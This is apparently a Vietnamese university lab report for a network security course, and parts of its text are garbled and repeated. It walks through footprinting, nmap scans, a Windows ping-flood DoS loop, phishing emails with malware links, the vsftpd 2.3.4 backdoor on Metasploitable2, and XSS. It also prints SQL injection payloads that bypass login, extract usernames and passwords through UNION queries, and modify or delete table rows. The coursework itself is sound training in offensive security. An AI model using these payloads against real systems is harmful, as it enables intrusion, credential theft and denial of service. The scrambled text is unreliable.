HỌC VIỆN CƠNG NGHỆ BƯU CHÍNH VIỄN THƠNG KHOA CƠNG NGHỆ THƠNG TIN Học phần: An tồn mạng Báo cáo thực hành Giảng viên hướng dẫn: TS Đặng Minh Tuấn MỤC LỤC BÀI 1: FOOTPRINT BÀI 2: SCANNING BÀI 3: SYSTEM HACKING 19 BÀI 4: TROJAN VÀ BACKDOOR 21 BÀI 5: CÁC PHƯƠNG PHÁP SNIFFER 22 BÀI 6: TẤN CÔNG TỪ CHỐI DỊCH VỤ DOS 24 BÀI 7: SOCIAL ENGINEERING 24 BÀI 8: HACKING WEB SERVER 26 BÀI 9: WEB APPLICATION HACKING 27 BÀI 10: SQL INJECTION 28 BÀI 11: BUFFER OVERFLOW 28 BÀI 1: FOOTPRINT I Tìm thơng tin domain - Tìm kiếm thơng tin domain itvietnam.com sử dụng trang web https://who.is/ - Tra cứu thông tin domain google.com sử dụng trang web https://whois.domaintools.com/ II Tìm thơng tin email - Sử dụng phần mềm 1st Email Address Spider (trang chủ: http://www.123hiddensender.com) - Keyword: vnn.vn BÀI 2: SCANNING I Sử dụng phần mềm nmap - Lấy thông tin từ máy từ xa xác định hệ điều hành máy • nmap -sS -P0 -sV -O Lấy danh sách máy chủ với cổng mở định nghĩa trước • nmap -p 135 -oG – 192.168.129.1 • nmap -p 445 -oG – 192.168.129.1 - Tìm tất địa IP hoạt động mạng 23 BÀI 6: TẤN CÔNG TỪ CHỐI DỊCH VỤ DOS Dùng lệnh "For /L %i in (1,1,100) start ping [ip victim] -l 10000 -t" cmd BÀI 7: SOCIAL ENGINEERING Gửi tin email giả mạo có đính kèm link chứa mã độc 24 25 BÀI 8: HACKING WEB SERVER - Cấu hình mạng máy victim (Metasploitable2) - Cấu hình mạng máy Kali Linux 26 - Khai thác backdoor Vsftpd v2.3.4 (port 6200) BÀI 9: WEB APPLICATION HACKING XSS Stored 27 BÀI 10: SQL INJECTION Vượt qua khâu xác thực người dùng - Nhập liệu cho phép đăng nhập mà không cần có đủ username password: o Đăng nhập tự do: nhập aaaa' or 1=1 28 Trích xuất liệu từ CSDL - Tìm số trường câu truy vấn trang: Số cột 3, số thứ tự bị lỗi - sam%' order by 3; 29 - sam%' order by 4; - sam%' union select 1,2,3; 30 - Hiển thị thông tin hệ quản trị CSDL hệ điều hành: - Trích xuất danh sách bảng CSDL: - Trích xuất danh sách trường bảng: 31 + ssss' union select '', a.name, from sys.columns a inner join sys.objects b on a.object_id = b.object_id where b.name='tbl_users'; + ssss' union select '', a.name, from sys.columns a inner join sys.objects b on a.object_id = b.object_id where b.name='students'; - Trích xuất liệu bảng: + ssss' union select full_name, username+' '+password, from tbl_users; 32 + ssss' union select lastname+' '+firstname, student_code+' '+password, student_id from students ; + ssss' union select lastname+' '+firstname, student_code+' '+password, student_id from students where student_code = 'B18DCAT118';-33 Thêm, sửa, xóa liệu + samsung'; update tbl_users set password='test' where username='david'; + samsung'; insert into tbl_users (full_name, username, password) values (Phan Thanh Hung','TH','th123'); 34 + samsung'; delete from tbl_users where username = 'TH'; BÀI 11: BUFFER OVERFLOW 35 36 37 ... trước • nmap -p 135 -oG – 1 92. 168. 129 .1 • nmap -p 445 -oG – 1 92. 168. 129 .1 - Tìm tất địa IP hoạt động mạng • nmap -sn 1 92. 168. 129 .* Ping dải địa IP • nmap -sP 1 92. 168. 129 .1 -25 5 II Sử dụng phần mềm... kèm link chứa mã độc 24 25 BÀI 8: HACKING WEB SERVER - Cấu hình mạng máy victim (Metasploitable2) - Cấu hình mạng máy Kali Linux 26 - Khai thác backdoor Vsftpd v2.3.4 (port 620 0) BÀI 9: WEB APPLICATION... Cấu hình mạng máy victim (Metasploitable2) 10 - - Cấu hình mạng máy Kali Linux 11 Lệnh ping từ Kali Linux sang máy victim - Lệnh ping từ máy victim sang Kali Linux 12 - Cấu hình file scan Nessus